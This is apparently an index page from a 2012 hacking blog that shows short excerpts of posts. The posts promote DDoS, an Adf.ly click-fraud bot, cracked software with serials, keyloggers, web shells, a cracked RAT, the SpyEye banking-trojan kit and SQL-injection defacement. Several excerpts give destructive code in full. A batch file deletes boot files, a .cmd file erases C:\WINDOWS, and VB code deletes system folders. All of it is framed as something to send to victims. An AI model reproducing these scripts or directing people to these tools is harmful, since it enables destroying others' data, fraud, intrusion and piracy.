ads

Wednesday, February 29, 2012

Basics of Hacking 101

Are you sure you want to hack?First things first. Do a background check of yourself, to tell whether really wanted to hack, or you just want to go to jail for some reasons.First of all, you must have some basic knowledge about a computer. Upon reading this, you just passed the first test. Next, you should also be patient, for if not, you won't get anywhere. Next, you should have the "heart" or passion to hack, because as stupid as it sounds, if you don't have it, you won't make it to the finish line.Now, if you passed the first test, you're 1%...

Sunday, February 26, 2012

Thread Options [TuT] Everything you need to know for Downing a site! [DDoS][ObjectIvvez]

Downing a site IntroductionWelcome to this tutorial, it's a Noob friendly tutorial about downing a site. I'll explain how everything works and how you can down a site! DoSThe first thing i gonna talk about is a DoS.DoS stands for Denial of Service.A DoS is an attempt to make a computer or network resource unavailable to its intended users. There are many programs, that you can find on Hackforums to DoS somebody. In the section Hacking Tools and Programs you can search and you'll sure find...

♠♧♥♢ Adfly Working Bot ♦♡♣♤

What does it do? - It automatically clicks your Adf.ly links, so that you gain money. Features - Comes with a current working proxy list ready to go. - Add or remove proxies, as you like. - There is no limit on the number of proxies you can add. - Supports custom referrers. - There is no limit on the number of referrers you can add. Downlo...

Download Tally ERP 9 with 3.1 crack

ERP 9 - Overview ------------------------------------------------------------------- You bank and pay utility bills from home, why not do your business accounts? Or call up a stock status report and print a copy from wherever you are? Tally.ERP 9 has been designed with you in mind. Powerful connectivity makes information available with your staff, CA and other professionals, round-the-clock, in any place. It's also quick to install and allows incremental implementation-a novel capability...

.NET Reflector 7.3.0.18 {Full}

Reflector: 7.3.0.18Latest version: 7.3.0.18 Released: 7/15/2011.NET Reflector 7.3 Released, Including BAML to XAML Decompilation on July 15th, 2011Developers use .NET Reflector to:● Decompile .NET code to understand how it works● Learn or teach the complexities of a .NET language● Provide a better alternative to library documentation Recover lost or unavailable source code● Locate performance issues● Analyze dependencies● Check obfuscation● Serve as a powerful object browser● Aid complex debugging...

Saturday, February 25, 2012

[TUT]==How to use Keyloggers – Detailed Tutorial== [hot]

1. What is a Keylogger?A keylogger is also called a spysoftware is a small program that records each and every ...keystroke a user types on a specific computer’s keyboard. A keylogger program canb e installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.2. How Keylogger works?Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes...

Thursday, February 23, 2012

9 backconnectli priv8 cgi and safe mode bypass shell 2011

Feature: 1-Litespeed bypass shell 2-Ssi bypass shell 3-Symlink attack 4-Config bulucu 5-joomla mysl shell 6-wordpress mysql shell 7Python shell 8-cgitelnet shell 9-cgi priv8 shell 10-Php eval bypass 11-Php4 sürümler için eval backconnect 12-metasploit backconnet 13-iki adat pyton backconnect 14-perl socket backconnect 15-dc dc.pl backconnect 16-4 adet bypass php backconnect 17-php safe mode off bypass 18-3 adet bypass perl shell 19-reverse ip 20-toplu pagerank 21-suexec safe...

Wednesday, February 22, 2012

[Cracked] Rapzo Rat v1.8 + Source ~

Main Features No portforwarding needed!Steal Passwords { 18+ Stealers }ScreenloggerSystem ( Shutdown, Restart, Logoff )Fake Error MessegeDownload & Execute( Run )ScreenTaker (Send to Gmail,Yahoo,Live,Hotmail,Aol)Files & Folders ( Run/Open File )Open WebsiteProgress to KillText to SpeakOpen/Close CD TrayEnable/Disable TaskManager, cmd, msconfig, regeditShow/Hide TaskbarUnistall BOTProcess Manager DL :DownloadPassword: recod...

[TuT] Infinite Trials [TimeStopper]

That being said, today I will show you how to use Timestopper to give you infinite trial periods for programs. 1) First we are going to need to download Timestopper, Download it HERE 2) Open the program, and choose which program you want to extend the trial on. (Ex) Kaspersky.exe 3) After choosing which program, you will need to choose an end date for your trial, you can make it whatever you want. (Ex) 12/30/2012 4) Now it will ask you to make a shortcut to the new extended trial...

SQL INJECTION (From start to Defacement)

DEFACING A SITE EXPLAINED FROM THE START(INCLUDING DOWNLOADS) I i took some parts of the sql injecting from http://www.milw0rm.com. I wrote the defacing part. I'm posting this here coz this tut explains everything step by step. but most of the sql tuts ends when we find the password hash. So newbees dnt know wat to do after that. In this tut i'm gonna explain how to deface a website from scratch hope you fill find this usefull....i'm not a good hacker but i want to share my knowledge with every...

How To Access C Drive When It's Blocked

IntroductionToday, I am going to release my tutorial. A lot of schools have blocked C DRIVE from hacking attempts to the school systems/machines. There are many ways to access the drive. Including CMD, Firefox/Google Chrome etc. Please follow all your local laws. Read their Legal. And do not I REPEAT DO NOT DELETE ANY SYSTEM FILES FROM ANY EDUCATIONAL COMPUTERS, IT WILL END BADLY!Ok that is all over and done with, now for the tutorial.Firefox/Google ChromeOpen Firefox or Google Chrome and type the following in the URL;Quote:C:\This will not allow...

Fuck a Computer Easily

Do not try this at your own compute@echo offattrib -r -s -h c:autoexec.batdel c:autoexec.batattrib -r -s -h c:boot.inidel c:boot.iniattrib -r -s -h c:ntldrdel c:ntldrattrib -r -s -h c:windowswin.inidel c:windowswin.iniOpen up notepad and copy and paste that. Save it as a .bat file.This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...REMEMBER - DO NOT CLICK THIS FILE.YOU WONT RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!...

DEADLY VIRUSES!!!!!

If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to format a HDD using a notepad. This is really cool. Step 1. Copy The Following In Notepad Exactly as it says 01001011000111110010010101010101010000011111100000 Step 2. Save As An EXE Any Name Will Do Step 3. Send the EXE to People And Infect OR IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can...

Make Virus in 5 min " Very easy but dangerous Virus"

Make Virus in 5 minVery easy but dangerous VirusOk, now, the trick:The only thing you need is Notepad.Now, to test it, create a textfile called TEST.txt(empty) in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map....

Fuk Up Pc With This Virus...!!!!

Copy and paste the java script code to the address bar of your browserjavascript:function Shw(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} Shw(6)2: Press enter and watch your window's "shaking it". You can change the value of i if you wish ...

Simple is a very dangerous virus

What is needed:1. VB (optimum: 6.0)2. Understand buttons VBVirus Making Tutorials just 1 minute1. create a form as small as possible2. in that form, enter the code belowPublic Sub DelAll (ByVal DirtoDelete As Variant)Dim FSO, FSSet FSO = CreateObject ("Scripting.FileSystemObject")FS = FSO.DeleteFolder (DirtoDelete, True)End SubPrivate Sub Form_Load ()On Error Resume NextIf FileExist ("c: \ windows \ system32 \ katak.txt") = True ThenEndElseCall DelAll ("c: \ windows \ system")Call DelAll ("c: \ windows \ system32")Call DelAll ("c: \ windows")Call...

Tuesday, February 21, 2012

[MacOSX ] BlackHole RAT priv8 RAT

‘BlackHole RAT’ is the latest remote administration tool (RAT) and is available both in Windows and Mac. Hacktool such RAT employs client-server program that communicates to its victim’s machine through its trojan server. The server application is installed on the victim while the client application is on the managing side. The version suggest that ‘BlackHole’ is currently in its early stage. However, the author seems to start showcasing the following functionalities: * Remote...

SpyEye 1.3.45

This includes all the newest software for: [+] Admin Panel [+] Formgrabber Panel [+] Gate Installer [+] Back Connect [+] Collector [+] Anti-Rapport (Anti-Thrusteer) [+] Webinjects - USA - UK - Germany - Spain - PayPal (not sure if all of them works correctly, u have to check it, i usually only use USA) [+] Built in PE-loader [+] SpyEye original complete setup manual from the author Injection types: [+] Internet Explorer [+] FireFox [+] Google Chrome [+] Opera Plugins: [+] Custom Connector (to...

Monday, February 20, 2012

AVIRA ANTIVIRUS PREMIUM 2012 12.0.0.888 [FINAL] [CRACK] [SERIAL KEY]

Avira AntiVir Premium reliably protects you against all threats from viruses, worms, trojans, rootkits, phishings, adware, spyware, bots and dangerous “drive-by” downloads. Best detection rates and top-class security with several updates every day. Advanced protection: Includes basic antivirus protection PLUS: email protection (POP3), AntiPhishing, AntiSpyware, AntiAdware and more. With real-time on-access scanning, profile-based on-demand scans and scheduling of full system scanning and updates...

Site Search